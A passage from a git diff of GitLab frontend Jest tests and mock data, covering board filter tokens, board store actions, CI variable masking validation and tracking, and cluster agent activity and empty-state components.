hasEmoji) symbol: '~', fetchLabels, }, - ...(hasEmoji ? [mockEmojiToken] : []), + ...(isSignedIn ? [mockEmojiToken, mockConfidentialToken] : []), { icon: 'clock', title: __('Milestone'), symbol: '%', - type: 'milestone_title', + type: 'milestone', token: MilestoneToken, unique: true, - defaultMilestones: DEFAULT_MILESTONES_GRAPHQL, fetchMilestones, }, { icon: 'issues', title: __('Type'), - type: 'types', + type: 'type', token: GlFilteredSearchToken, unique: true, options: [ @@ -623,11 +628,11 @@ export const mockTokens = (fetchLabels, fetchAuthors, fetchMilestones, hasEmoji) ], }, { - icon: 'weight', - title: __('Weight'), - type: 'weight', - token: WeightToken, - unique: true, + type: 'release', + title: __('Release'), + icon: 'rocket', + token: ReleaseToken, + fetchReleases: expect.any(Function), }, ]; @@ -670,3 +675,14 @@ export const mockGroupLabelsResponse = { }, }, }; + +export const boardListQueryResponse = (issuesCount = 20) => ({ + data: { + boardList: { + __typename: 'BoardList', + id: 'gid://gitlab/BoardList/5', + totalWeight: 5, + issuesCount, + }, + }, +}); diff --git a/spec/frontend/boards/stores/actions_spec.js b/spec/frontend/boards/stores/actions_spec.js index e245325b956..51340a3ea4f 100644 --- a/spec/frontend/boards/stores/actions_spec.js +++ b/spec/frontend/boards/stores/actions_spec.js @@ -20,7 +20,7 @@ import { formatIssue, getMoveData, updateListPosition, -} from '~/boards/boards_util'; +} from 'ee_else_ce/boards/boards_util'; import { gqlClient } from '~/boards/graphql'; import destroyBoardListMutation from '~/boards/graphql/board_list_destroy.mutation.graphql'; import issueCreateMutation from '~/boards/graphql/issue_create.mutation.graphql'; @@ -1241,6 +1241,7 @@ describe('updateIssueOrder', () => { moveBeforeId: undefined, moveAfterId: undefined, }, + update: expect.anything(), }; jest.spyOn(gqlClient, 'mutate').mockResolvedValue({ data: { @@ -1447,6 +1448,7 @@ describe('addListNewIssue', () => { variables: { input: formatIssueInput(mockIssue, stateWithBoardConfig.boardConfig), }, + update: expect.anything(), }); }); @@ -1478,6 +1480,7 @@ describe('addListNewIssue', () => { variables: { input: formatIssueInput(issue, stateWithBoardConfig.boardConfig), }, + update: expect.anything(), }); expect(payload.labelIds).toEqual(['gid://gitlab/GroupLabel/4', 'gid://gitlab/GroupLabel/5']); expect(payload.assigneeIds).toEqual(['gid://gitlab/User/1', 'gid://gitlab/User/2']); @@ -1570,7 +1573,7 @@ describe('addListNewIssue', () => { describe('setActiveIssueLabels', () => { const state = { boardItems: { [mockIssue.id]: mockIssue } }; - const getters = { activeBoardItem: mockIssue }; + const getters = { activeBoardItem: { ...mockIssue, labels } }; const testLabelIds = labels.map((label) => label.id); const input = { labelIds: testLabelIds, @@ -1579,11 +1582,7 @@ describe('setActiveIssueLabels', () => { labels, }; - it('should assign labels on success', (done) => { - jest - .spyOn(gqlClient, 'mutate') - .mockResolvedValue({ data: { updateIssue: { issue: { labels: { nodes: labels } } } } }); - + it('should assign labels', () => { const payload = { itemId: getters.activeBoardItem.id, prop: 'labels', @@ -1601,74 +1600,28 @@ describe('setActiveIssueLabels', () => { }, ], [], - done, ); }); - it('throws error if fails', async () => { - jest - .spyOn(gqlClient, 'mutate') - .mockResolvedValue({ data: { updateIssue: { errors: ['failed mutation'] } } }); - - await expect(actions.setActiveIssueLabels({ getters }, input)).rejects.toThrow(Error); - }); - - describe('labels_widget FF on', () => { - beforeEach(() => { - window.gon = { - features: { labelsWidget: true }, - }; - - getters.activeBoardItem = { ...mockIssue, labels }; - }); - - afterEach(() => { - window.gon = { - features: {}, - }; - }); - - it('should assign labels', () => { - const payload = { - itemId: getters.activeBoardItem.id, - prop: 'labels', - value: labels, - }; - - testAction( - actions.setActiveIssueLabels, - input, - { ...state, ...getters }, - [ - { - type: types.UPDATE_BOARD_ITEM_BY_ID, - payload, - }, - ], - [], - ); - }); - - it('should remove label', () => { - const payload = { - itemId: getters.activeBoardItem.id, - prop: 'labels', - value: [labels[1]], - }; + it('should remove label', () => { + const payload = { + itemId: getters.activeBoardItem.id, + prop: 'labels', + value: [labels[1]], + }; - testAction( - actions.setActiveIssueLabels, - { ...input, removeLabelIds: [getIdFromGraphQLId(labels[0].id)] }, - { ...state, ...getters }, - [ - { - type: types.UPDATE_BOARD_ITEM_BY_ID, - payload, - }, - ], - [], - ); - }); + testAction( + actions.setActiveIssueLabels, + { ...input, removeLabelIds: [getIdFromGraphQLId(labels[0].id)] }, + { ...state, ...getters }, + [ + { + type: types.UPDATE_BOARD_ITEM_BY_ID, + payload, + }, + ], + [], + ); }); }); diff --git a/spec/frontend/ci_lint/components/ci_lint_spec.js b/spec/frontend/ci_lint/components/ci_lint_spec.js index 36d860b1ccd..70d116c12d3 100644 --- a/spec/frontend/ci_lint/components/ci_lint_spec.js +++ b/spec/frontend/ci_lint/components/ci_lint_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import waitForPromises from 'helpers/wait_for_promises'; import CiLint from '~/ci_lint/components/ci_lint.vue'; import CiLintResults from '~/pipeline_editor/components/lint/ci_lint_results.vue'; -import lintCIMutation from '~/pipeline_editor/graphql/mutations/lint_ci.mutation.graphql'; +import lintCIMutation from '~/pipeline_editor/graphql/mutations/client/lint_ci.mutation.graphql'; import SourceEditor from '~/vue_shared/components/source_editor.vue'; import { mockLintDataValid } from '../mock_data'; diff --git a/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js b/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js index 5c7404c1175..7c4ff67feb3 100644 --- a/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js +++ b/spec/frontend/ci_variable_list/components/ci_variable_modal_spec.js @@ -1,9 +1,10 @@ import { GlButton, GlFormInput } from '@gitlab/ui'; import { createLocalVue, shallowMount, mount } from '@vue/test-utils'; import Vuex from 'vuex'; +import { mockTracking } from 'helpers/tracking_helper'; import CiEnvironmentsDropdown from '~/ci_variable_list/components/ci_environments_dropdown.vue'; import CiVariableModal from '~/ci_variable_list/components/ci_variable_modal.vue'; -import { AWS_ACCESS_KEY_ID } from '~/ci_variable_list/constants'; +import { AWS_ACCESS_KEY_ID, EVENT_LABEL, EVENT_ACTION } from '~/ci_variable_list/constants'; import createStore from '~/ci_variable_list/store'; import mockData from '../services/mock_data'; import ModalStub from '../stubs'; @@ -14,9 +15,12 @@ localVue.use(Vuex); describe('Ci variable modal', () => { let wrapper; let store; + let trackingSpy; + + const maskableRegex = '^[a-zA-Z0-9_+=/@:.~-]{8,}$'; const createComponent = (method, options = {}) => { - store = createStore({ isGroup: options.isGroup }); + store = createStore({ maskableRegex, isGroup: options.isGroup }); wrapper = method(CiVariableModal, { attachTo: document.body, stubs: { @@ -138,6 +142,7 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = invalidKeyVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); it(`${rendered ? 'renders' : 'does not render'} the variable reference warning`, () => { @@ -226,6 +231,7 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = invalidMaskVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); }); it('disables the submit button', () => { @@ -235,6 +241,50 @@ describe('Ci variable modal', () => { it('shows the correct error text', () => { expect(findModal().text()).toContain(maskError); }); + + it('sends the correct tracking event', () => { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTION, { + label: EVENT_LABEL, + property: ';', + }); + }); + }); + + describe.each` + value | secret | masked | eventSent | trackingErrorProperty + ${'value'} | ${'secretValue'} | ${false} | ${0} | ${null} + ${'shortMasked'} | ${'short'} | ${true} | ${0} | ${null} + ${'withDollar$Sign'} | ${'dollar$ign'} | ${false} | ${1} | ${'$'} + ${'withDollar$Sign'} | ${'dollar$ign'} | ${true} | ${1} | ${'$'} + ${'unsupported'} | ${'unsupported|char'} | ${true} | ${1} | ${'|'} + ${'unsupportedMasked'} | ${'unsupported|char'} | ${false} | ${0} | ${null} + `('Adding a new variable', ({ value, secret, masked, eventSent, trackingErrorProperty }) => { + beforeEach(() => { + const [variable] = mockData.mockVariables; + const invalidKeyVariable = { + ...variable, + key: 'key', + value, + secret_value: secret, + masked, + }; + createComponent(mount); + store.state.variable = invalidKeyVariable; + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it(`${ + eventSent > 0 ? 'sends the correct' : 'does not send the' + } variable validation tracking event`, () => { + expect(trackingSpy).toHaveBeenCalledTimes(eventSent); + + if (eventSent > 0) { + expect(trackingSpy).toHaveBeenCalledWith(undefined, EVENT_ACTION, { + label: EVENT_LABEL, + property: trackingErrorProperty, + }); + } + }); }); describe('when both states are valid', () => { @@ -249,7 +299,6 @@ describe('Ci variable modal', () => { }; createComponent(mount); store.state.variable = validMaskandKeyVariable; - store.state.maskableRegex = /^[a-zA-Z0-9_+=/@:.~-]{8,}$/; }); it('does not disable the submit button', () => { diff --git a/spec/frontend/clusters/agents/components/activity_events_list_spec.js b/spec/frontend/clusters/agents/components/activity_events_list_spec.js new file mode 100644 index 00000000000..4abbd77dfb7 --- /dev/null +++ b/spec/frontend/clusters/agents/components/activity_events_list_spec.js @@ -0,0 +1,102 @@ +import { GlLoadingIcon, GlAlert, GlEmptyState } from '@gitlab/ui'; +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { useFakeDate } from 'helpers/fake_date'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import ActivityEvents from '~/clusters/agents/components/activity_events_list.vue'; +import ActivityHistoryItem from '~/clusters/agents/components/activity_history_item.vue'; +import getAgentActivityEventsQuery from '~/clusters/agents/graphql/queries/get_agent_activity_events.query.graphql'; +import { mockResponse, mockEmptyResponse } from '../../mock_data'; + +const activityEmptyStateImage = '/path/to/image'; +const projectPath = 'path/to/project'; +const agentName = 'cluster-agent'; + +Vue.use(VueApollo); + +describe('ActivityEvents', () => { + let wrapper; + useFakeDate([2021, 12, 3]); + + const provideData = { + agentName, + projectPath, + activityEmptyStateImage, + }; + + const createWrapper = ({ queryResponse = null } = {}) => { + const agentEventsQueryResponse = queryResponse || jest.fn().mockResolvedValue(mockResponse); + const apolloProvider = createMockApollo([ + [getAgentActivityEventsQuery, agentEventsQueryResponse], + ]); + + wrapper = shallowMountExtended(ActivityEvents, { + apolloProvider, + provide: provideData, + }); + }; + + const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); + const findAlert = () => wrapper.findComponent(GlAlert); + const findEmptyState = () => wrapper.findComponent(GlEmptyState); + const findAllActivityHistoryItems = () => wrapper.findAllComponents(ActivityHistoryItem); + const findSectionTitle = (at) => wrapper.findAllByTestId('activity-section-title').at(at); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('while the agentEvents query is loading', () => { + it('displays a loading icon', async () => { + createWrapper(); + + expect(findLoadingIcon().exists()).toBe(true); + await waitForPromises(); + expect(findLoadingIcon().exists()).toBe(false); + }); + }); + + describe('when the agentEvents query has errored', () => { + beforeEach(() => { + createWrapper({ queryResponse: jest.fn().mockRejectedValue() }); + return waitForPromises(); + }); + + it('displays an alert message', () => { + expect(findAlert().exists()).toBe(true); + }); + }); + + describe('when there are no agentEvents', () => { + beforeEach(() => { + createWrapper({ queryResponse: jest.fn().mockResolvedValue(mockEmptyResponse) }); + }); + + it('displays an empty state with the correct illustration', () => { + expect(findEmptyState().exists()).toBe(true); + expect(findEmptyState().props('svgPath')).toBe(activityEmptyStateImage); + }); + }); + + describe('when the agentEvents are present', () => { + const length = mockResponse.data?.project?.clusterAgent?.activityEvents?.nodes?.length; + + beforeEach(() => { + createWrapper(); + }); + it('renders an activity-history-item components for every event', () => { + expect(findAllActivityHistoryItems()).toHaveLength(length); + }); + + it.each` + recordedAt | date | lineNumber + ${'2021-12-03T01:06:56Z'} | ${'Today'} | ${0} + ${'2021-12-02T19:26:56Z'} | ${'Yesterday'} | ${1} + ${'2021-11-22T19:26:56Z'} | ${'2021-11-22'} | ${2} + `('renders correct titles for different days', ({ date, lineNumber }) => { + expect(findSectionTitle(lineNumber).text()).toBe(date); + }); + }); +}); diff --git a/spec/frontend/clusters/agents/components/activity_history_item_spec.js b/spec/frontend/clusters/agents/components/activity_history_item_spec.js new file mode 100644 index 00000000000..100a280d0cc --- /dev/null +++ b/spec/frontend/clusters/agents/components/activity_history_item_spec.js @@ -0,0 +1,56 @@ +import { GlSprintf } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import { sprintf } from '~/locale'; +import HistoryItem from '~/vue_shared/components/registry/history_item.vue'; +import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; +import ActivityHistoryItem from '~/clusters/agents/components/activity_history_item.vue'; +import { EVENT_DETAILS, DEFAULT_ICON } from '~/clusters/agents/constants'; +import { mockAgentHistoryActivityItems } from '../../mock_data'; + +const agentName = 'cluster-agent'; + +describe('ActivityHistoryItem', () => { + let wrapper; + + const createWrapper = ({ event = {} }) => { + wrapper = shallowMount(ActivityHistoryItem, { + propsData: { event }, + stubs: { + HistoryItem, + GlSprintf, + }, + }); + }; + + const findHistoryItem = () => wrapper.findComponent(HistoryItem); + const findTimeAgo = () => wrapper.find(TimeAgoTooltip); + + afterEach(() => { + wrapper.destroy(); + }); + + describe.each` + kind | icon | title | lineNumber + ${'token_created'} | ${EVENT_DETAILS.token_created.eventTypeIcon} | ${sprintf(EVENT_DETAILS.token_created.title, { tokenName: agentName })} | ${0} + ${'token_revoked'} | ${EVENT_DETAILS.token_revoked.eventTypeIcon} | ${sprintf(EVENT_DETAILS.token_revoked.title, { tokenName: agentName })} | ${1} + ${'agent_connected'} | ${EVENT_DETAILS.agent_connected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_connected.title, { titleIcon: '' })} | ${2} + ${'agent_disconnected'} | ${EVENT_DETAILS.agent_disconnected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_disconnected.title, { titleIcon: '' })} | ${3} + ${'agent_connected'} | ${EVENT_DETAILS.agent_connected.eventTypeIcon} | ${sprintf(EVENT_DETAILS.agent_connected.title, { titleIcon: '' })} | ${4} + ${'unknown_agent'} | ${DEFAULT_ICON} | ${'unknown_agent Event occurred'} | ${5} + `('when the event type is $kind event', ({ icon, title, lineNumber }) => { + beforeEach(() => { + const event = mockAgentHistoryActivityItems[lineNumber]; + createWrapper({ event }); + }); + it('renders the correct icon', () => { + expect(findHistoryItem().props('icon')).toBe(icon); + }); + it('renders the correct title', () => { + expect(findHistoryItem().text()).toContain(title); + }); + it('renders the correct time-ago tooltip', () => { + const activityEvents = mockAgentHistoryActivityItems; + expect(findTimeAgo().props('time')).toBe(activityEvents[lineNumber].recordedAt); + }); + }); +}); diff --git a/spec/frontend/clusters/agents/components/show_spec.js b/spec/frontend/clusters/agents/components/show_spec.js index c502e7d813e..d5a8117f48c 100644 --- a/spec/frontend/clusters/agents/components/show_spec.js +++ b/spec/frontend/clusters/agents/components/show_spec.js @@ -5,6 +5,7 @@ import VueApollo from 'vue-apollo'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import ClusterAgentShow from '~/clusters/agents/components/show.vue'; import TokenTable from '~/clusters/agents/components/token_table.vue'; +import ActivityEvents from '~/clusters/agents/components/activity_events_list.vue'; import getAgentQuery from '~/clusters/agents/graphql/queries/get_cluster_agent.query.graphql'; import { useFakeDate } from 'helpers/fake_date'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -27,6 +28,7 @@ describe('ClusterAgentShow', () => { id: '1', createdAt: '2021-02-13T00:00:00Z', createdByUser: { + id: 'user-1', name: 'user-1', }, name: 'token-1', @@ -39,7 +41,8 @@ describe('ClusterAgentShow', () => { const createWrapper = ({ clusterAgent, queryResponse = null }) => { const agentQueryResponse = - queryResponse || jest.fn().mockResolvedValue({ data: { project: { clusterAgent } } }); + queryResponse || + jest.fn().mockResolvedValue({ data: { project: { id: 'project-1', clusterAgent } } }); const apolloProvider = createMockApollo([[getAgentQuery, agentQueryResponse]]); wrapper = extendedWrapper( @@ -70,6 +73,7 @@ describe('ClusterAgentShow', () => { const findPaginationButtons = () => wrapper.findComponent(GlKeysetPagination); const findTokenCount = () => wrapper.findByTestId('cluster-agent-token-count').text(); const findEESecurityTabSlot = () => wrapper.findByTestId('ee-security-tab'); + const findActivity = () => wrapper.findComponent(ActivityEvents); afterEach(() => { wrapper.destroy(); @@ -101,6 +105,10 @@ describe('ClusterAgentShow', () => { it('should not render pagination buttons when there are no additional pages', () => { expect(findPaginationButtons().exists()).toBe(false); }); + + it('renders activity events list', () => { + expect(findActivity().exists()).toBe(true); + }); }); describe('when create user is unknown', () => { diff --git a/spec/frontend/clusters/mock_data.js b/spec/frontend/clusters/mock_data.js new file mode 100644 index 00000000000..75306ca0295 --- /dev/null +++ b/spec/frontend/clusters/mock_data.js @@ -0,0 +1,165 @@ +const user = { + id: 1, + name: 'Administrator', + username: 'root', + webUrl: 'http://172.31.0.1:3000/root', +}; + +const agentToken = { + id: 1, + name: 'cluster-agent', +}; + +export const defaultActivityEvent = { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, +}; + +export const mockAgentActivityEvents = [ + { + kind: 'token_created', + level: 'info', + recordedAt: '2021-12-03T01:06:56Z', + agentToken, + user, + }, + + { + kind: 'token_revoked', + level: 'info', + recordedAt: '2021-12-03T00:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_disconnected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + }, + + { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + }, +]; + +export const mockResponse = { + data: { + project: { + id: 'project-1', + clusterAgent: { + id: 'cluster-agent', + activityEvents: { + nodes: mockAgentActivityEvents, + }, + }, + }, + }, +}; + +export const mockEmptyResponse = { + data: { + project: { + id: 'project-1', + clusterAgent: { + id: 'cluster-agent', + activityEvents: { + nodes: [], + }, + }, + }, + }, +}; + +export const mockAgentHistoryActivityItems = [ + { + kind: 'token_created', + level: 'info', + recordedAt: '2021-12-03T01:06:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'cluster-agent created', + body: 'Token created by Administrator', + }, + + { + kind: 'token_revoked', + level: 'info', + recordedAt: '2021-12-03T00:26:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'cluster-agent revoked', + body: 'Token revoked by Administrator', + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Connected', + body: 'Agent Connected', + }, + + { + kind: 'agent_disconnected', + level: 'info', + recordedAt: '2021-12-02T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Not connected', + body: 'Agent Not connected', + }, + + { + kind: 'agent_connected', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'connected', + title: 'Connected', + body: 'Agent Connected', + }, + + { + kind: 'unknown_agent', + level: 'info', + recordedAt: '2021-11-22T19:26:56Z', + agentToken, + user, + eventTypeIcon: 'token', + title: 'unknown_agent', + body: 'Event occurred', + }, +]; diff --git a/spec/frontend/clusters_list/components/agent_empty_state_spec.js b/spec/frontend/clusters_list/components/agent_empty_state_spec.js index 38f0e0ba2c4..ed2a0d0b97b 100644 --- a/spec/frontend/clusters_list/components/agent_empty_state_spec.js +++ b/spec/frontend/clusters_list/components/agent_empty_state_spec.js @@ -1,34 +1,29 @@ -import { GlAlert, GlEmptyState, GlSprintf } from '@gitlab/ui'; +import { GlEmptyState, GlSprintf, GlLink, GlButton } from '@gitlab/ui'; import AgentEmptyState from '~/clusters_list/components/agent_empty_state.vue'; +import { INSTALL_AGENT_MODAL_ID } from '~/clusters_list/constants'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { helpPagePath } from '~/helpers/help_page_helper'; const emptyStateImage = '/path/to/image'; -const projectPath = 'path/to/project'; -const multipleClustersDocsUrl = helpPagePath('user/project/clusters/multiple_kubernetes_clusters'); -const installDocsUrl = helpPagePath('administration/clusters/kas'); +const installDocsUrl = helpPagePath('user/clusters/agent/index'); describe('AgentEmptyStateComponent', () => { let wrapper; - - const propsData = { - hasConfigurations: false, - }; const provideData = { emptyStateImage, - projectPath, }; - const findConfigurationsAlert = () => wrapper.findComponent(GlAlert); - const findMultipleClustersDocsLink = () => wrapper.findByTestId('multiple-clusters-docs-link'); - const findInstallDocsLink = () => wrapper.findByTestId('install-docs-link'); - const findIntegrationButton = () => wrapper.findByTestId('integration-primary-button'); + const findInstallDocsLink = () => wrapper.findComponent(GlLink); + const findIntegrationButton = () => wrapper.findComponent(GlButton); const findEmptyState = () => wrapper.findComponent(GlEmptyState); beforeEach(() => { wrapper = shallowMountExtended(AgentEmptyState, { - propsData, provide: provideData, + directives: { + GlModalDirective: createMockDirective(), + }, stubs: { GlEmptyState, GlSprintf }, }); }); @@ -39,33 +34,21 @@ describe('AgentEmptyStateComponent', () => { } }); - it('renders correct href attributes for the links', () => { - expect(findMultipleClustersDocsLink().attributes('href')).toBe(multipleClustersDocsUrl); - expect(findInstallDocsLink().attributes('href')).toBe(installDocsUrl); + it('renders the empty state', () => { + expect(findEmptyState().exists()).toBe(true); }); - describe('when there are no agent configurations in repository', () => { - it('should render notification message box', () => { - expect(findConfigurationsAlert().exists()).toBe(true); - }); + it('renders button for the agent registration', () => { + expect(findIntegrationButton().exists()).toBe(true); + }); - it('should disable integration button', () => { - expect(findIntegrationButton().attributes('disabled')).toBe('true'); - }); + it('renders correct href attributes for the docs link', () => { + expect(findInstallDocsLink().attributes('href')).toBe(installDocsUrl); }); - describe('when there is a list of agent configurations', () => { - beforeEach(() => { - propsData.hasConfigurations = true; - wrapper = shallowMountExtended(AgentEmptyState, { - propsData, - provide: provideData, - }); - }); - it('should render content without notification message box', () => { - expect(findEmptyState().exists()).toBe(true); - expect(findConfigurationsAlert().exists()).toBe(false); - expect(findIntegrationButton().attributes('disabled')).toBeUndefined(); - }); + it('renders correct modal id for the agent registration modal', () => { + const binding = getBinding(findIntegrationButton().element, 'gl-modal-directive'); + + expect(binding.value).toBe(INSTALL_AGENT_MODAL_ID); }); }); diff --git a/spec/frontend/clusters_list/components/agents_spec.js b/spec/frontend/clusters_list/components/agents_spec.js index 2dec7cdc973..c9ca10f6bf7 100644 --- a/spec/frontend/clusters_list/components/agents_spec.js +++ b/spec/frontend/clusters_list/components/agents_spec.js @@ -19,7 +19,6 @@ describe('Agents', () => { }; const provideData = { projectPath: 'path/to/project', - kasAddress: 'kas.example.com', }; const createWrapper = ({ props = {}, agents = [], pageInfo = null, trees = [], count = 0 }) => { @@ -27,6 +26,7 @@ describe('Agents', () => { const apolloQueryResponse = { data: { project: { + id: '1', clusterAgents: { nodes: agents, pageInfo, tokens: { nodes: [] }, count }, repository: { tree: { trees: { nodes: trees, pageInfo } } }, }, @@ -76,6 +76,7 @@ describe('Agents', () => { tokens: { nodes: [ { + id: 'token-1', lastUsedAt: testDate, }, ], @@ -87,6 +88,7 @@ describe('Agents', () => { const trees = [ { + id: 'tree-1', name: 'agent-2', path: '.gitlab/agents/agent-2', webPath: '/project/path/.gitlab/agents/agent-2', @@ -216,24 +218,6 @@ describe('Agents', () => { }); }); - describe('when the agent configurations are present', () => { - const trees = [ - { - name: 'agent-1', - path: '.gitlab/agents/agent-1', - webPath: '/project/path/.gitlab/agents/agent-1', - }, - ]; - - beforeEach(() => { - return createWrapper({ agents: [], trees }); - }); - - it('should pass the correct hasConfigurations boolean value to empty state component', () => { - expect(findEmptyState().props('hasConfigurations')).toEqual(true); - }); - }); - describe('when agents query has errored', () => { beforeEach(() => { return createWrapper({ agents: null }); diff --git a/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js b/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js index 40c2c59e187..bcc1d4e8b9e 100644 --- a/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js +++ b/spec/frontend/clusters_list/components/available_agents_dropwdown_spec.js @@ -1,14 +1,7 @@ import { GlDropdown, GlDropdownItem } from '@gitlab/ui'; -import { createLocalVue, mount } from '@vue/test-utils'; -import VueApollo from 'vue-apollo'; +import { shallowMount } from '@vue/test-utils'; import AvailableAgentsDropdown from '~/clusters_list/components/available_agents_dropdown.vue'; import { I18N_AVAILABLE_AGENTS_DROPDOWN } from '~/clusters_list/constants'; -import agentConfigurationsQuery from '~/clusters_list/graphql/queries/agent_configurations.query.graphql'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import { agentConfigurationsResponse } from './mock_data'; - -const localVue = createLocalVue(); -localVue.use(VueApollo); describe('AvailableAgentsDropdown', () => { let wrapper; @@ -18,46 +11,19 @@ describe('AvailableAgentsDropdown', () => { const findDropdownItems = () => wrapper.findAllComponents(GlDropdownItem); const findConfiguredAgentItem = () => findDropdownItems().at(0); - const createWrapper = ({ propsData = {}, isLoading = false }) => { - const provide = { - projectPath: 'path/to/project', - }; - - wrapper = (() => { - if (isLoading) { - const mocks = { - $apollo: { - queries: { - agents: { - loading: true, - }, - }, - }, - }; - - return mount(AvailableAgentsDropdown, { mocks, provide, propsData }); - } - - const apolloProvider = createMockApollo([ - [agentConfigurationsQuery, jest.fn().mockResolvedValue(agentConfigurationsResponse)], - ]); - - return mount(AvailableAgentsDropdown, { - localVue, - apolloProvider, - provide, - propsData, - }); - })(); + const createWrapper = ({ propsData }) => { + wrapper = shallowMount(AvailableAgentsDropdown, { + propsData, + }); }; afterEach(() => { wrapper.destroy(); - wrapper = null; }); describe('there are agents available', () => { const propsData = { + availableAgents: ['configured-agent'], isRegistering: false, }; @@ -69,12 +35,6 @@ describe('AvailableAgentsDropdown', () => { expect(findDropdown().props('text')).toBe(i18n.selectAgent); }); - it('shows only agents that are not yet installed', () => { - expect(findDropdownItems()).toHaveLength(1); - expect(findConfiguredAgentItem().text()).toBe('configured-agent'); - expect(findConfiguredAgentItem().props('isChecked')).toBe(false); - }); - describe('click events', () => { beforeEach(() => { findConfiguredAgentItem().vm.$emit('click'); @@ -93,6 +53,7 @@ describe('AvailableAgentsDropdown', () => { describe('registration in progress', () => { const propsData = { + availableAgents: ['configured-agent'], isRegistering: true, }; @@ -108,22 +69,4 @@ describe('AvailableAgentsDropdown', () => { expect(findDropdown().props('loading')).toBe(true); }); }); - - describe('agents query is loading', () => { - const propsData = { - isRegistering: false, - }; - - beforeEach(() => { - createWrapper({ propsData, isLoading: true }); - }); - - it('updates the text in the dropdown', () => { - expect(findDropdown().text()).toBe(i18n.selectAgent); - }); - - it('displays a loading icon', () => { - expect(findDropdown().props('loading')).toBe(true); - }); - }); }); diff --git a/spec/frontend/clusters_list/components/clusters_empty_state_spec.js b/spec/frontend/clusters_list/components/clusters_empty_state_spec.js index f7e1791d0f7..cf0f6881960 100644 --- a/spec/frontend/clusters_list/components/clusters_empty_state_spec.js +++ b/spec/frontend/clusters_list/components/clusters_empty_state_spec.js @@ -6,35 +6,33 @@ import ClusterStore from '~/clusters_list/store'; const clustersEmptyStateImage = 'path/to/svg'; const newClusterPath = '/path/to/connect/cluster'; const emptyStateHelpText = 'empty state text'; -const canAddCluster = true; describe('ClustersEmptyStateComponent', () => { let wrapper; - const propsData = { - isChildComponent: false, - }; - - const provideData = { + const defaultProvideData = { clustersEmptyStateImage, - emptyStateHelpText: null, newClusterPath, }; - const entryData = { - canAddCluster, - }; - const findButton = () => wrapper.findComponent(GlButton); const findEmptyStateText = () => wrapper.findByTestId('clusters-empty-state-text'); - beforeEach(() => { + const createWrapper = ({ + provideData = { emptyStateHelpText: null }, + isChildComponent = false, + canAddCluster = true, + } = {}) => { wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, + store: ClusterStore({ canAddCluster }), + propsData: { isChildComponent }, + provide: { ...defaultProvideData, ...provideData }, stubs: { GlEmptyState }, }); + }; + + beforeEach(() => { + createWrapper(); }); afterEach(() => { @@ -55,16 +53,7 @@ describe('ClustersEmptyStateComponent', () => { describe('when the component is loaded as a child component', () => { beforeEach(() => { - propsData.isChildComponent = true; - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, - }); - }); - - afterEach(() => { - propsData.isChildComponent = false; + createWrapper({ isChildComponent: true }); }); it('should not render the action button', () => { @@ -74,12 +63,7 @@ describe('ClustersEmptyStateComponent', () => { describe('when the help text is provided', () => { beforeEach(() => { - provideData.emptyStateHelpText = emptyStateHelpText; - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, - }); + createWrapper({ provideData: { emptyStateHelpText } }); }); it('should show the empty state text', () => { @@ -88,14 +72,8 @@ describe('ClustersEmptyStateComponent', () => { }); describe('when the user cannot add clusters', () => { - entryData.canAddCluster = false; beforeEach(() => { - wrapper = shallowMountExtended(ClustersEmptyState, { - store: ClusterStore(entryData), - propsData, - provide: provideData, - stubs: { GlEmptyState }, - }); + createWrapper({ canAddCluster: false }); }); it('should disable the button', () => { expect(findButton().props('disabled')).toBe(true); diff --git a/spec/frontend/clusters_list/components/clusters_main_view_spec.js b/spec/frontend/clusters_list/components/clusters_main_view_spec.js index c2233e5d39c..37665bf7abd 100644 --- a/spec/frontend/clusters_list/components/clusters_main_view_spec.js +++ 